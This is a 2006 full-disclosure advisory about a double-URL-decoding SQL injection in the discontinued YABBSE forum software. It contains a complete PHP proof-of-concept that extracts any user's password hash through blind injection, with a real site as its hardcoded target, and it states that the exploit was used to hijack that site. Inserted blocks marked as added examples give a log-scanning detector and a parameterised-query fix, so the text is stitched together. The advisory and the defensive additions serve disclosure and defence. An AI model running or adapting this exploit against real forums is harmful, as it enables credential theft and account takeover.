
yabbse-all.txt

Posted Jun 29, 2006
Authored by Sam Thomas

Exploit for all versions of yabbse that retrieves any user's password hash.

tags | exploit
SHA-256 | cfdfdf127220b379e824bae8db741a18c7b8280f69303c3c2a9034e52bf3565c

Hey str0ke - Are you the same str0ke whose code I've been ripping, damn I guess I better release my first N3td3v Sponsoring Disclosure.....

NDSD-06-001: YABBSE SQL Injection
June 23, 2006

-- Sponsored post

http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046903.html

-- Affected Vendor:
The YABB SE Team

-- Affected Products:
YABBSE (This product is discontinued, but unfortunately still seems to be in mainstream use)

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary SQL on vulnerable installations of the YABBSE message board.

The specific flaw exists within the "profile.php" php script which is used to give access to user profiles.

-- Vendor Response:
The vendor for this product essentially no longer exists. It is recommended that you move to a supported message board.

-- Disclosure Timeline:
2005.06.26 - Vulnerability Discovered
2005.06.27 - Vendor found to have discontinued support
2006.06.23 - Public release of advisory

-- Vulnerability

The vulnerability exists where the user-supplied variable $user is processed by the urldecode() function twice; this allows the %2527 SQL injection technique (%2527 decodes to %27, which in turn decodes to ').
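From the defender's side, the double-decoding described above leaves a distinctive trace: a legitimate apostrophe in a name arrives as %27, while the bypass needs the percent sign itself encoded, i.e. %2527. The following added example (not part of the advisory or of YABBSE) scans web-server access-log lines in common log format for double-encoded SQL metacharacters in the request target. The log lines, client addresses and timestamps are constructed samples; the request shape mirrors the one in this advisory.

```php
<?php
// Added example: flag requests whose target carries double-URL-encoded SQL
// metacharacters (the %2527 pattern from the advisory). Sample lines below
// are constructed, not real traffic.

// Double-encoded forms of characters that matter inside an SQL literal.
const DOUBLE_ENCODED = [
    '%2527'       => "'",
    '%2522'       => '"',
    '%2523'       => '#',
    '%253b'       => ';',
    '%252d%252d'  => '--',
];

// Return the decoded metacharacters present in a request target ([] if none).
// A single %27 is not reported: "O%27Brien" is ordinary for a name field.
function doubleEncodedMetachars(string $target): array {
    $hits = [];
    foreach (DOUBLE_ENCODED as $encoded => $plain) {
        if (stripos($target, $encoded) !== false) {
            $hits[] = $plain;
        }
    }
    return $hits;
}

// Scan common-log-format lines; returns [line number => finding].
function scanAccessLog(array $lines): array {
    $findings = [];
    foreach ($lines as $n => $line) {
        // host ident authuser [time] "METHOD target PROTOCOL" status bytes
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(?:\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
            continue;   // not a CLF line; skip rather than guess
        }
        $chars = doubleEncodedMetachars($m[2]);
        if ($chars !== []) {
            $findings[$n + 1] = [
                'client' => $m[1],
                'target' => $m[2],
                'status' => (int) $m[3],
                'chars'  => $chars,
            ];
        }
    }
    return $findings;
}

// Constructed sample log: two benign profile views, then two requests in the
// shape of the blind-injection loop from the advisory (one per guessed digit).
$sampleLog = [
    '192.0.2.10 - - [23/Jun/2006:10:00:01 +0000] "GET /board/index.php?board=1;action=viewprofile;user=alice HTTP/1.1" 200 5120',
    '192.0.2.10 - - [23/Jun/2006:10:00:02 +0000] "GET /board/index.php?board=1;action=viewprofile;user=O%27Brien HTTP/1.1" 200 5000',
    '198.51.100.7 - - [23/Jun/2006:10:00:03 +0000] "GET /board/index.php?board=;action=viewprofile;user=alice%2527+AND+mid(passwd,1,1)=%2527a HTTP/1.1" 200 4800',
    '198.51.100.7 - - [23/Jun/2006:10:00:04 +0000] "GET /board/index.php?board=;action=viewprofile;user=alice%2527+AND+mid(passwd,1,1)=%2527b HTTP/1.1" 200 3100',
];

foreach (scanAccessLog($sampleLog) as $lineNo => $f) {
    printf("line %d: %s -> %s (double-encoded: %s, status %d)\n",
        $lineNo, $f['client'], $f['target'], implode(' ', $f['chars']), $f['status']);
}
```

Only the last two lines are reported. Note that the status code is no help here: the application answers 200 whether or not the injected condition held, since the exploit distinguishes outcomes by the "An Error Has Occurred" text in the body. A burst of such requests from one client, differing only in the trailing character and position, is the signature of the character-by-character extraction loop.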

- Exploit

The following PoC exploit can be used to retrieve any user's (i.e. admin's) password hash, which in turn can be used to imitate and log in as that user:

**BEGIN PoC Code

<?php
/*
yabbse exploit

all versions - product discontinued

most of the code ripped from http://www.milw0rm.com/exploits/1036 so credit to str0ke and milkw0rm
*/

$server = "www.uberhacker.com";
$user = "Dozix007";
$port = 80;

$hash = "";

$hex = "0123456789abcdef";
for ($i = 1; $i <= 32; $i++) {
    $idx = 0;
    $found = false;

    while (!($found)) {
        $letter = substr($hex, $idx, 1);

        /* %2527 translates to %27, which gets past magic quotes. This is translated to ' by urldecode. */
        $url = "/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" . $letter;
        $header = getHeader($server, $port, $url, "");
        if (!preg_match("/An Error Has Occurred/", $header)) {
            echo $i . ": " . $letter . "\n";
            $found = true;
            $hash .= $letter;
        } else {
            $idx++;
        }
    }
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
    $ip = gethostbyname($server);
    $fp = fsockopen($ip, $port);

    if (!$fp) {
        return "Unknown";
    } else {
        $com = "GET $file HTTP/1.1\r\n";
        $com .= "Host: $server:$port\r\n";
        $com .= "Connection: close\r\n";
        $com .= "\r\n";

        fputs($fp, $com);

        $header = "";

        do {
            $header .= fread($fp, 512);
        } while (!preg_match('/\r\n\r\n$/', $header));
    }

    return $header;
}
?>
// jazzy2fives 2005-07-26 - mostly stolen from milw0rm.com [2005-06-08]

** End PoC Code

-- Patch

It is recommended that, if you insist on continuing to use this product, you remove the line which reads "$user = urldecode($user);" from all functions in "\sources\profile.php".
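To make the mechanism and the patch concrete, here is an added example that is not code from the advisory or from YABBSE. It models the profile lookup in a few lines against an in-memory SQLite table (table name, rows and hash values are constructed): PHP decodes the query string once before the script runs, so user=alice%2527 on the wire reaches the script as "alice%27"; the addslashes() call stands in for the magic_quotes_gpc escaping that PHP applied at the time, which sees no quote to escape; the second urldecode() then produces a bare quote inside the SQL string. The "safe" function shows the stronger fix: drop the extra decode and bind the value as a parameter rather than interpolating it.

```php
<?php
// Added example (not from the advisory): the double-decode flaw next to a
// parameterised lookup, against a constructed in-memory SQLite table.

function makeDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE members (name TEXT, passwd TEXT)");
    // constructed rows; the hash values are placeholders
    $db->exec("INSERT INTO members VALUES ('admin', 'placeholder-hash-1'), ('alice', 'placeholder-hash-2')");
    return $db;
}

// What the script receives: PHP already URL-decodes the query string once,
// so "alice%2527" on the wire is "alice%27" in $_GET['user'].
function requestValue(string $onTheWire): string {
    return urldecode($onTheWire);
}

// Stand-in for magic_quotes_gpc: backslash-escape quotes in request data.
function magicQuotes(string $v): string {
    return addslashes($v);
}

// Vulnerable flow, as in the advisory: escaping runs first and sees "%27"
// (no quote), then a second urldecode() turns "%27" into a literal ' that is
// interpolated straight into the statement.
function buildQueryVulnerable(string $getValue): string {
    $user = magicQuotes($getValue);
    $user = urldecode($user);        // the line the advisory says to remove
    return "SELECT name FROM members WHERE name = '$user'";
}

// Fixed flow: no second decode, and the value is bound, never interpolated,
// so no byte of user input is ever parsed as SQL.
function lookupSafe(PDO $db, string $getValue): array {
    $stmt = $db->prepare("SELECT name FROM members WHERE name = ?");
    $stmt->execute([$getValue]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = makeDb();
$onTheWire = 'alice%2527';                  // request line as the server sees it
$getValue  = requestValue($onTheWire);      // "alice%27", what $_GET holds

$sql = buildQueryVulnerable($getValue);
echo "vulnerable statement: $sql\n";        // the quote escapes the literal
try {
    $db->query($sql);
} catch (PDOException $e) {
    echo "database rejected the broken statement: " . $e->getMessage() . "\n";
}

echo "safe lookup for " . json_encode($getValue) . ": " . json_encode(lookupSafe($db, $getValue)) . "\n";
echo "safe lookup for \"alice\": " . json_encode(lookupSafe($db, 'alice')) . "\n";
```

Running this prints the vulnerable statement with an unbalanced quote at the end of the literal, which SQLite refuses to parse, while the bound lookup returns an empty list for "alice%27" (no member has that literal name) and ["alice"] for "alice". Removing the urldecode() line, as the advisory advises, closes this particular bypass, but it leaves the query relying on magic quotes for its safety; binding the parameter removes the interpolation altogether and is the change to make if the code must stay in service.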

-- Credit:

This vulnerability was discovered by me!

-- About N3td3v Sponsoring Disclosures:

Established by me, n3td3v sponsoring disclosures (NDSD) is a system established to reward n3td3v for his (her?) posts to full disclosure which bring me more amusement than any 0-day possibly could.

The NDSD is unique in how vulnerability information sponsors the incompetency of n3td3v, for each amusing n3td3v post NDSD will attempt to release a disclosure of a previously unknown lame exploit. This is because most valid complaints against n3td3v claim that (s/)he contributes nothing to the security community. The aim of NDSD is to sponsor n3td3v posts thus ensuring that each directly corresponds to a positive contribution to FULL-DISCLOSURE.

-- Misc

For anyone interested, this was the exploit used to hijack www.uberhacker.com - a legal hacker training site, which had as their primary challenge to hijack the website. The site has since had the majority of its content removed.

NDSD are a subsidiary of empty vessels (www.emptyvessels.org.uk), one day we might get our website up.
